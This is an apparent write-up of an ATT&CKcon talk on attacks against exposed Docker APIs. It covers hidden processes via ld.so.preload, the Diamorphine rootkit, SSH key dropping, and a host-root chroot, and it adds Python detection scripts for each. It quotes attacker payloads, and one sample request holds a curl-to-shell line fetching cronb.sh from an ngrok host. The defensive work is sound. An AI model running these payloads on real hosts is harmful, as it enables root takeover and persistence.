From ATT&CKcon 3.0
By Jared Stroud, Lacework
Adversaries target common cloud misconfigurations in container-focused workflows for initial access. Whether in Docker or Kubernetes environments, Lacework Labs has identified adversaries attempting to deploy malicious container images (T1610), mine cryptocurrency (T1496), and deploy C2 agents. Defenders new to the container space may be unaware of the built-in capabilities of popular container runtime engines that can help defend against rogue containers being deployed into their environment. Attendees will walk away with an understanding of what these attack patterns look like, based on honeypot data Lacework has gathered over the past year, as well as techniques for defending their own container-focused workloads.
Notable Execution of Initial Payload (cronb.sh)
Ghidra pseudo-C of the shared objects grabbed by the Docker bash script
● T1574.006 - Hijack Execution Flow: Dynamic Linker Hijacking
○ Used for persistence/defense evasion
● The attack script wgets a tar file of shared objects, places them in /usr/local/lib, and adds them to /etc/ld.so.preload so the loader maps them into every dynamically linked process.
https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c
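The check a defender would run after reading the slide above, as an added example that is not code from the talk or from the libprocesshider project: the loader treats /etc/ld.so.preload as a whitespace-separated list of shared objects to map into every dynamically linked process, so the file should normally be absent or empty, and any entry outside the distribution's own library directories (the allowed list below is an assumption) deserves a look. The sample file content is constructed; it mirrors the /usr/local/lib drop location described above, which is also the install path libprocesshider's README documents.

```python
"""Audit /etc/ld.so.preload for entries planted by a dynamic-linker hijack.

Added example, not code from the talk or from libprocesshider. The allowed
library directories are an assumption; adjust them for the distribution.
"""
import os
from typing import List, NamedTuple

PRELOAD_FILE = "/etc/ld.so.preload"

# Directories where a distribution's own shared objects live (assumption).
SYSTEM_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64")


class PreloadFinding(NamedTuple):
    path: str
    reason: str  # empty string when the entry looks legitimate


def parse_preload(text: str) -> List[str]:
    """Split ld.so.preload the way glibc's loader does: entries are separated
    by whitespace and '#' starts a comment that runs to end of line."""
    entries: List[str] = []
    for line in text.splitlines():
        entries.extend(line.split("#", 1)[0].split())
    return entries


def audit_preload(text: str, lib_dirs=SYSTEM_LIB_DIRS,
                  check_disk: bool = False) -> List[PreloadFinding]:
    """Classify every preload entry. Reasons, in priority order: relative
    path, outside the system library directories, or (with check_disk)
    listed but missing on disk."""
    findings: List[PreloadFinding] = []
    for path in parse_preload(text):
        reason = ""
        if not path.startswith("/"):
            reason = "relative path, resolved through the library search path"
        elif not any(path.startswith(d.rstrip("/") + "/") for d in lib_dirs):
            reason = "outside system library directories"
        elif check_disk and not os.path.isfile(path):
            reason = "listed but missing on disk"
        findings.append(PreloadFinding(path, reason))
    return findings


def suspicious(findings: List[PreloadFinding]) -> List[PreloadFinding]:
    """Only the entries that got a reason."""
    return [f for f in findings if f.reason]


# Constructed sample (not a capture): the drop path from the payload above
# next to a library that lives where the distribution keeps its own.
SAMPLE_PRELOAD = """\
# constructed sample, not a capture
/usr/local/lib/libprocesshider.so
/usr/lib/x86_64-linux-gnu/libc_malloc_debug.so.0
"""


def audit_live_host() -> List[PreloadFinding]:
    """Audit the real file; an absent file is the healthy case."""
    if not os.path.exists(PRELOAD_FILE):
        return []
    with open(PRELOAD_FILE, encoding="utf-8", errors="replace") as fh:
        return audit_preload(fh.read(), check_disk=True)


if __name__ == "__main__":
    for f in suspicious(audit_preload(SAMPLE_PRELOAD)):
        print(f"sample: {f.path}: {f.reason}")
    for f in suspicious(audit_live_host()):
        print(f"host: {f.path}: {f.reason}")
```

One caveat: a preloaded library can hook open()/fopen() in every dynamically linked process, including the one running this audit, and hide or rewrite /etc/ld.so.preload on the way in. Run the check from a statically linked binary, or against the disk mounted from a clean system, when the host is already suspect.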
Defense Evasion/Persistence - Diamorphine Rootkit
● Rootkit (T1014) features include:
○ When loaded, the module starts invisible.
○ Hide/unhide any process by sending it signal 31.
○ Sending signal 63 (to any pid) makes the module become (in)visible.
○ Sending signal 64 (to any pid) makes the given user become root.
○ Files or directories starting with the MAGIC_PREFIX become invisible.
● Diamorphine is built on the victim machine, and the MAGIC_PREFIX is left unchanged from the upstream default.
diamorphine.h from the attacker's payload:
https://github.com/m0nad/Diamorphine/blob/master/diamorphine.h
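Both hiding techniques on the last two slides, the preloaded libprocesshider and the Diamorphine kernel module, filter what a directory listing returns and nothing else, so one cross-view check exposes both. The following is an added example, not code from the talk or from either rootkit project: libprocesshider hooks readdir(3) in every process that loads it through ld.so.preload, and Diamorphine hooks getdents/getdents64 in the kernel and unlinks itself from the module list behind /proc/modules, but neither blocks opening a /proc/<pid> path that is guessed rather than listed, and Diamorphine leaves its /sys/module entry in place. The sample data is constructed; the module name "diamorphine" is the upstream default that an unmodified build keeps.

```python
"""Cross-view checks for the process and module hiding described above.

Added example, not code from the talk or from the rootkit projects. Both
techniques filter directory listings: libprocesshider hooks readdir(3) in
every process that loads it via ld.so.preload, and Diamorphine hooks
getdents/getdents64 in the kernel and unlinks itself from the module list
behind /proc/modules. Neither touches open() of a guessed /proc path, and
Diamorphine keeps its /sys/module directory, so a second, independent view
of the same data exposes what the listing hides. Samples are constructed.
"""
import os
from typing import Dict, Iterable, Set


def hidden_pids(listed: Iterable[int], probed: Iterable[int]) -> Set[int]:
    """PIDs confirmed by probing /proc/<pid> that the readdir() listing omits."""
    return set(probed) - set(listed)


def parse_proc_modules(text: str) -> Set[str]:
    """Module names from /proc/modules (the data behind lsmod)."""
    return {line.split()[0] for line in text.splitlines() if line.split()}


def hidden_modules(listed: Set[str], sys_module: Dict[str, bool]) -> Set[str]:
    """Modules whose /sys/module/<name> has an initstate file (loaded as a
    module, not built in) but which are missing from /proc/modules. Built-in
    code also gets a /sys/module entry for its parameters, without initstate."""
    loaded = {name for name, has_initstate in sys_module.items() if has_initstate}
    return loaded - listed


# Live collectors: the filterable view and the unfiltered view of the same data.

def listed_pids() -> Set[int]:
    """What a (possibly hooked) readdir() of /proc reports."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def probed_pids() -> Set[int]:
    """Open /proc/<pid>/status for every possible pid instead of listing /proc.
    Only thread-group leaders (Tgid == pid) count, because /proc/<tid> is
    reachable for every thread even though readdir() never lists threads."""
    with open("/proc/sys/kernel/pid_max") as fh:
        pid_max = int(fh.read())
    found: Set[int] = set()
    for pid in range(1, pid_max + 1):
        try:
            with open(f"/proc/{pid}/status") as fh:
                for line in fh:
                    if line.startswith("Tgid:"):
                        if int(line.split()[1]) == pid:
                            found.add(pid)
                        break
        except (FileNotFoundError, ProcessLookupError, PermissionError):
            continue
    return found


def scan_sys_module(root: str = "/sys/module") -> Dict[str, bool]:
    """name -> whether /sys/module/<name>/initstate exists."""
    return {name: os.path.exists(os.path.join(root, name, "initstate"))
            for name in os.listdir(root)}


# Constructed sample (not a capture): diamorphine unlinked from the module list
# but still in sysfs, printk as a built-in with parameters only, and pid 1337
# hidden with signal 31.
SAMPLE_PROC_MODULES = """\
overlay 147456 0 - Live 0x0000000000000000
br_netfilter 32768 0 - Live 0x0000000000000000
bridge 307200 1 br_netfilter, Live 0x0000000000000000
"""
SAMPLE_SYS_MODULE = {"overlay": True, "br_netfilter": True, "bridge": True,
                     "diamorphine": True, "printk": False}
SAMPLE_LISTED_PIDS = {1, 2, 500, 1200}
SAMPLE_PROBED_PIDS = {1, 2, 500, 1200, 1337}


if __name__ == "__main__":
    print("sample hidden pids:", hidden_pids(SAMPLE_LISTED_PIDS, SAMPLE_PROBED_PIDS))
    print("sample hidden modules:", hidden_modules(
        parse_proc_modules(SAMPLE_PROC_MODULES), SAMPLE_SYS_MODULE))
    print("host hidden pids:", hidden_pids(listed_pids(), probed_pids()))
    with open("/proc/modules") as fh:
        print("host hidden modules:", hidden_modules(
            parse_proc_modules(fh.read()), scan_sys_module()))
```

The probe loop walks up to pid_max entries (4194304 on many systemd hosts), so it takes a few seconds; that is the price of not trusting the listing. The userland half only works because libprocesshider hooks readdir alone; a statically linked probe sidesteps a preload-based hider entirely, while a kernel module that also hooked the path lookup would defeat this check, so treat a clean result as evidence, not proof.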
T1098.004 - Account Manipulation: SSH Authorized Keys (SSH Key Dropping)
Exposed API port (2375)
Attacker's payload: echo an SSH key to /root/.ssh/authorized_keys
● "cmd": ["sh", "-c", "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIdl8SFK8a6VAjM6i8AAUtpl15<snippet>' >> /opt/root/.ssh/authorized_keys"]
● The /opt/root/... path shows the host filesystem bind-mounted under /opt inside the container, so the write lands in the host's /root/.ssh/authorized_keys and gives the attacker root SSH access to the host.
T1608 - Stage Capabilities (Docker Hub)
● Lacework Labs has observed multiple adversaries leveraging Docker Hub as a staging ground for their images.
T1608 - Stage Capabilities (Ngrok)
● Ngrok - a legitimate utility for proxying local services to a public-facing endpoint (T1090 - Proxy).
○ Target users are developers who want to expose something running locally to the internet.
○ Think of it as reverse SSH tunnels-as-a-service.
● How adversaries abuse it:
○ Hosting payloads behind ngrok.
■ Free and paid tiers exist.
○ Avoids having to set up infrastructure beyond a VM.
Stopping the Compromise! Don't expose the Docker socket!
Exposed API port (2375)
Attacker's payload
● mount /:/mnt && chroot /mnt
○ Shorthand for creating the container with the host's root filesystem bound at /mnt and then chrooting into it: the attacker is now root on the host, not in a container.
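Both payloads shown against the exposed API port (the authorized_keys write and the /:/mnt chroot), plus the Docker Hub and ngrok staging from the earlier slides, are visible in one place: the JSON body of POST /containers/create that the daemon receives. The following is an added example, not code from the talk or from Docker, of a rule set over that body. The rules, the Docker Hub and ngrok heuristics, and the bind paths, key and URLs in the constructed sample bodies are assumptions for illustration, not captures.

```python
"""Flag container-create requests like the ones the talk shows hitting an
exposed Docker Engine API on TCP 2375.

Added example, not code from the talk or from Docker. It runs a small rule set
over the JSON body of POST /containers/create, which is what both payloads
above become once they reach the daemon. The rules and the Docker Hub/ngrok
heuristics are assumptions for illustration; the sample bodies are constructed
to mirror the payloads and are not captures.
"""
import json
import re
import sys
from typing import Any, Dict, List

# Command-line patterns worth a finding (assumed heuristics, labelled with the
# ATT&CK technique each maps to).
CMD_RULES = [
    (re.compile(r"authorized_keys"), "ssh-key-drop (T1098.004)"),
    (re.compile(r"\bchroot\s+/"), "chroot-into-host-mount"),
    (re.compile(r"ld\.so\.preload"), "ld.so.preload-write (T1574.006)"),
    (re.compile(r"ngrok(-free)?\.(io|app)\b"), "ngrok-staging (T1608)"),
]


def image_source(ref: str) -> str:
    """Where an image reference resolves: 'official' (Docker Hub library/),
    'hub' (a Docker Hub user namespace) or the explicit registry host."""
    if "/" not in ref:
        return "official"
    first = ref.split("/", 1)[0]
    if "." in first or ":" in first or first == "localhost":
        return first
    return "hub"


def _as_list(value: Any) -> List[str]:
    """Cmd/Entrypoint may be absent, a string or a list; normalise to a list."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else [str(v) for v in value]


def inspect_create_request(body: Dict[str, Any]) -> List[str]:
    """Return finding labels for one /containers/create body, or [] if clean."""
    findings: List[str] = []
    host = body.get("HostConfig") or {}

    # The host's root filesystem inside the container is root on the host.
    for bind in host.get("Binds") or []:          # "src:dst[:opts]"
        if bind.split(":", 1)[0] == "/":
            findings.append("host-root-bind: " + bind)
    for mount in host.get("Mounts") or []:        # long-form equivalent
        if mount.get("Type") == "bind" and mount.get("Source") == "/":
            findings.append("host-root-mount: " + str(mount.get("Target")))
    if host.get("Privileged"):
        findings.append("privileged")
    if host.get("PidMode") == "host":
        findings.append("host-pid-namespace")

    # Entrypoint runs first, Cmd is appended to it.
    cmdline = " ".join(_as_list(body.get("Entrypoint")) + _as_list(body.get("Cmd")))
    for pattern, label in CMD_RULES:
        if pattern.search(cmdline):
            findings.append(label)

    image = body.get("Image") or ""
    if image_source(image) == "hub":
        findings.append("docker-hub-user-image: " + image)
    return findings


# Constructed request bodies mirroring the two payloads above (assumed bind
# paths, key and URLs; not captures).
SAMPLE_SSH_KEY_DROP = {
    "Image": "alpine",
    "Cmd": ["sh", "-c",
            "echo 'ssh-rsa AAAAB3...<snippet>' >> /opt/root/.ssh/authorized_keys"],
    "HostConfig": {"Binds": ["/:/opt"]},
}
SAMPLE_CHROOT = {
    "Image": "someuser/miner:latest",
    "Cmd": ["sh", "-c", "chroot /mnt sh -c 'curl https://example.ngrok.io/cronb.sh | sh'"],
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True},
}
SAMPLE_BENIGN = {
    "Image": "nginx:1.25",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"PortBindings": {"80/tcp": [{"HostPort": "8080"}]}},
}


if __name__ == "__main__":
    # Pipe a request body in, or run without stdin to see the samples.
    bodies = [json.load(sys.stdin)] if not sys.stdin.isatty() else [
        SAMPLE_SSH_KEY_DROP, SAMPLE_CHROOT, SAMPLE_BENIGN]
    for body in bodies:
        print(body.get("Image"), "->", inspect_create_request(body) or "clean")
```

A rule set like this belongs in front of the daemon (a Docker authorization plugin or a reverse proxy that terminates the API) or in detection over the daemon's request log. It does not replace the slide's advice: do not bind dockerd to tcp://0.0.0.0:2375 at all. Where remote access is required, use the TLS client-certificate transport (dockerd --tlsverify on 2376) or the CLI's ssh:// transport, so an unauthenticated POST never reaches the create endpoint in the first place.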